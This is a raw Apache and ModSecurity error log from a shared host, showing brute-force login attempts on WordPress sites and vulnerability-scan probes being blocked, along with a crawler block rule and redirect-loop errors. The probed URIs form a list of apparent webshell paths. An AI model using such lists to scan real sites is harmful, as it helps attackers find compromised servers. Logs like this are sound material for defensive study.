[Tue May 26 18:39:50.027519 2026] [security2:error] [pid 1015481:tid 1015512] [remote 82.223.24.195:49180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.24.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbnbQIKfWDMlp2INdSKgABgh4"]
[Tue May 26 18:39:50.212762 2026] [security2:error] [pid 1015481:tid 1015719] [client 20.196.127.68:3954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/ws.php"] [unique_id "ahWbnrQIKfWDMlp2INdSNwAAAXY"]
[Tue May 26 18:39:50.223520 2026] [security2:error] [pid 1015481:tid 1015633] [client 20.151.117.104:14617] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/k.php"] [unique_id "ahWbnrQIKfWDMlp2INdSOAAAASA"]
[Tue May 26 18:39:50.594652 2026] [security2:error] [pid 1015481:tid 1015674] [client 20.151.117.104:14584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-blink.php"] [unique_id "ahWbnrQIKfWDMlp2INdSPwAAAUk"]
[Tue May 26 18:39:50.616558 2026] [security2:error] [pid 1015481:tid 1015689] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbnrQIKfWDMlp2INdSNgAAAVg"]
[Tue May 26 18:39:50.820710 2026] [security2:error] [pid 1015481:tid 1015688] [client 20.196.127.68:5952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/wsa.php"] [unique_id "ahWbnrQIKfWDMlp2INdSRAAAAVc"]
[Tue May 26 18:39:50.850712 2026] [security2:error] [pid 1015481:tid 1015668] [client 124.43.5.103:63110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbnrQIKfWDMlp2INdSRQAAAUM"]
[Tue May 26 18:39:50.850829 2026] [security2:error] [pid 1015481:tid 1015668] [client 124.43.5.103:63110] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbnrQIKfWDMlp2INdSRQAAAUM"]
[Tue May 26 18:39:51.138298 2026] [security2:error] [pid 1015481:tid 1015716] [client 130.131.224.225:64910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/forbidals.php"] [unique_id "ahWbn7QIKfWDMlp2INdSTgAAAXM"]
[Tue May 26 18:39:51.138434 2026] [security2:error] [pid 1015481:tid 1015716] [client 130.131.224.225:64910] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/forbidals.php"] [unique_id "ahWbn7QIKfWDMlp2INdSTgAAAXM"]
[Tue May 26 18:39:51.197685 2026] [security2:error] [pid 1015481:tid 1015690] [client 20.151.117.104:14647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/ww5.php"] [unique_id "ahWbn7QIKfWDMlp2INdSTwAAAVk"]
[Tue May 26 18:39:51.434688 2026] [security2:error] [pid 1015481:tid 1015611] [client 20.196.127.68:12629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/w.php"] [unique_id "ahWbn7QIKfWDMlp2INdSUwAAAQo"]
[Tue May 26 18:39:51.481968 2026] [security2:error] [pid 1015481:tid 1015660] [client 20.151.117.104:10326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/2.php"] [unique_id "ahWbn7QIKfWDMlp2INdSVQAAATs"]
[Tue May 26 18:39:51.748879 2026] [security2:error] [pid 1015481:tid 1015727] [client 20.151.117.104:14564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-admin/classwithtostring.php"] [unique_id "ahWbn7QIKfWDMlp2INdSXwAAAX4"]
[Tue May 26 18:39:51.938297 2026] [security2:error] [pid 1015481:tid 1015737] [client 31.57.184.20:61901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.senoro.com.mx"] [uri "/wp-login.php"] [unique_id "ahWbn7QIKfWDMlp2INdSYgAAAYg"]
[Tue May 26 18:39:52.013073 2026] [security2:error] [pid 1015481:tid 1015676] [client 20.151.117.104:14651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/atomlib.php"] [unique_id "ahWboLQIKfWDMlp2INdSZwAAAUs"]
[Tue May 26 18:39:52.043281 2026] [security2:error] [pid 1015481:tid 1015706] [client 20.196.127.68:6765] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/x.php"] [unique_id "ahWboLQIKfWDMlp2INdSaAAAAWk"]
[Tue May 26 18:39:52.358357 2026] [security2:error] [pid 1015481:tid 1015719] [client 20.151.117.104:10336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/rip.php"] [unique_id "ahWboLQIKfWDMlp2INdSbgAAAXY"]
[Tue May 26 18:39:52.394747 2026] [security2:error] [pid 1015481:tid 1015733] [client 31.57.184.20:62310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.senoro.com.mx"] [uri "/wp-login.php"] [unique_id "ahWboLQIKfWDMlp2INdSbwAAAYQ"], referer: https://t.co/
[Tue May 26 18:39:52.634189 2026] [security2:error] [pid 1015481:tid 1015708] [client 20.196.127.68:7628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/xx.php"] [unique_id "ahWboLQIKfWDMlp2INdSeQAAAWs"]
[Tue May 26 18:39:52.661004 2026] [security2:error] [pid 1015481:tid 1015654] [client 20.151.117.104:14096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/p.php"] [unique_id "ahWboLQIKfWDMlp2INdSegAAATU"]
[Tue May 26 18:39:52.994087 2026] [security2:error] [pid 1015481:tid 1015619] [client 20.151.117.104:14638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/php.php"] [unique_id "ahWboLQIKfWDMlp2INdShwAAARI"]
[Tue May 26 18:39:53.226695 2026] [security2:error] [pid 1015481:tid 1015687] [client 83.217.213.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWbobQIKfWDMlp2INdSkgAAAVY"], referer: http://anujtradingco.com/homepages/portfolio-photo/
[Tue May 26 18:39:53.350341 2026] [security2:error] [pid 1015481:tid 1015671] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWboLQIKfWDMlp2INdSgwAAAUY"]
[Tue May 26 18:39:53.520781 2026] [security2:error] [pid 1015481:tid 1015686] [client 20.196.127.68:5954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/xmlrpc.php"] [unique_id "ahWbobQIKfWDMlp2INdSkwAAAVU"]
[Tue May 26 18:39:53.882332 2026] [security2:error] [pid 1015481:tid 1015520] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbobQIKfWDMlp2INdSqAABgSY"]
[Tue May 26 18:39:53.883165 2026] [security2:error] [pid 1015481:tid 1015730] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbobQIKfWDMlp2INdSqAABgSY"]
[Tue May 26 18:39:54.024798 2026] [security2:error] [pid 1015481:tid 1015666] [client 72.14.147.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahWbobQIKfWDMlp2INdSmgAAAUE"]
[Tue May 26 18:39:54.077569 2026] [security2:error] [pid 1015481:tid 1015727] [client 72.14.147.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahWbobQIKfWDMlp2INdSmwAAAX4"]
[Tue May 26 18:39:54.137978 2026] [security2:error] [pid 1015481:tid 1015650] [client 20.196.127.68:9001] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/y.php"] [unique_id "ahWborQIKfWDMlp2INdSqQAAATE"]
[Tue May 26 18:39:56.013680 2026] [security2:error] [pid 1015481:tid 1015685] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbo7QIKfWDMlp2INdSxAAAAVQ"]
[Tue May 26 18:39:58.279442 2026] [security2:error] [pid 1015481:tid 1015665] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbpbQIKfWDMlp2INdS9wAAAUA"]
[Tue May 26 18:40:01.090267 2026] [security2:error] [pid 1015481:tid 1015493] [remote 5.42.158.148:59448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWbqLQIKfWDMlp2INdTRQABbgs"]
[Tue May 26 18:40:01.374427 2026] [security2:error] [pid 1015481:tid 1015693] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbqLQIKfWDMlp2INdTSgAAAVw"]
[Tue May 26 18:40:01.401828 2026] [security2:error] [pid 1015481:tid 1015703] [client 114.119.146.40:45919] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.gciamd.org.in"] [uri "/overview"] [unique_id "ahWbqbQIKfWDMlp2INdTWgAAAWY"], referer: https://www.gciamd.org.in/overview
[Tue May 26 18:40:01.611452 2026] [security2:error] [pid 1015481:tid 1015706] [client 124.43.5.103:26251] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbqbQIKfWDMlp2INdTXgAAAWk"]
[Tue May 26 18:40:01.611564 2026] [security2:error] [pid 1015481:tid 1015706] [client 124.43.5.103:26251] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbqbQIKfWDMlp2INdTXgAAAWk"]
[Tue May 26 18:40:01.638950 2026] [security2:error] [pid 1015481:tid 1015542] [remote 216.73.216.30:14097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWbqbQIKfWDMlp2INdTYgABNjw"]
[Tue May 26 18:40:01.844561 2026] [security2:error] [pid 1015481:tid 1015524] [remote 5.42.158.148:59448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWbqbQIKfWDMlp2INdTZQABYCo"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 18:40:03.538032 2026] [security2:error] [pid 1015481:tid 1015644] [client 130.131.224.225:64952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/i.php"] [unique_id "ahWbq7QIKfWDMlp2INdTmgAAASs"]
[Tue May 26 18:40:03.538143 2026] [security2:error] [pid 1015481:tid 1015644] [client 130.131.224.225:64952] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/i.php"] [unique_id "ahWbq7QIKfWDMlp2INdTmgAAASs"]
[Tue May 26 18:40:04.653414 2026] [security2:error] [pid 1015481:tid 1015714] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbrLQIKfWDMlp2INdTsAAAAXE"]
[Tue May 26 18:40:04.774470 2026] [security2:error] [pid 1015481:tid 1015534] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbrLQIKfWDMlp2INdTugABNDQ"]
[Tue May 26 18:40:04.774655 2026] [security2:error] [pid 1015481:tid 1015653] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbrLQIKfWDMlp2INdTugABNDQ"]
[Tue May 26 18:40:05.528051 2026] [security2:error] [pid 1015481:tid 1015561] [remote 78.142.18.172:34098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbrbQIKfWDMlp2INdTzgABT08"]
[Tue May 26 18:40:05.755653 2026] [security2:error] [pid 1015481:tid 1015663] [client 170.203.113.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbrbQIKfWDMlp2INdT1AAAAT4"]
[Tue May 26 18:40:05.765199 2026] [security2:error] [pid 1015481:tid 1015562] [remote 78.142.18.172:34098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbrbQIKfWDMlp2INdT3QABd1A"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:40:06.244527 2026] [security2:error] [pid 1015481:tid 1015697] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbrbQIKfWDMlp2INdT4AAAAWA"]
[Tue May 26 18:40:09.267215 2026] [security2:error] [pid 1015481:tid 1015627] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbsLQIKfWDMlp2INdUDgAAARo"]
[Tue May 26 18:40:10.238580 2026] [security2:error] [pid 1015481:tid 1015691] [client 85.208.96.205:30276] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-8-12/list/"] [unique_id "ahWbsrQIKfWDMlp2INdULgAAAVo"]
[Tue May 26 18:40:10.238722 2026] [security2:error] [pid 1015481:tid 1015691] [client 85.208.96.205:30276] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-8-12/list/"] [unique_id "ahWbsrQIKfWDMlp2INdULgAAAVo"]
[Tue May 26 18:40:11.491135 2026] [security2:error] [pid 1015481:tid 1015720] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbs7QIKfWDMlp2INdUQQAAAXc"]
[Tue May 26 18:40:11.718729 2026] [security2:error] [pid 1015481:tid 1015483] [remote 94.76.235.103:33492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWbs7QIKfWDMlp2INdUSwABOAE"]
[Tue May 26 18:40:12.719045 2026] [security2:error] [pid 1015481:tid 1015723] [client 124.43.5.103:63677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbtLQIKfWDMlp2INdUXQAAAXo"]
[Tue May 26 18:40:12.719259 2026] [security2:error] [pid 1015481:tid 1015723] [client 124.43.5.103:63677] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWbtLQIKfWDMlp2INdUXQAAAXo"]
[Tue May 26 18:40:13.916116 2026] [security2:error] [pid 1015481:tid 1015499] [remote 119.18.52.246:55852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWbtbQIKfWDMlp2INdUbAABQhE"]
[Tue May 26 18:40:14.052844 2026] [core:error] [pid 1015481:tid 1015702] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.052873 2026] [core:error] [pid 1015481:tid 1015702] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.069500 2026] [core:error] [pid 1015481:tid 1015659] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.069518 2026] [core:error] [pid 1015481:tid 1015659] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.070263 2026] [core:error] [pid 1015481:tid 1015665] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.070285 2026] [core:error] [pid 1015481:tid 1015665] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.072971 2026] [core:error] [pid 1015481:tid 1015616] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 18:40:14.073007 2026] [core:error] [pid 1015481:tid 1015616] [client 49.37.212.27:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
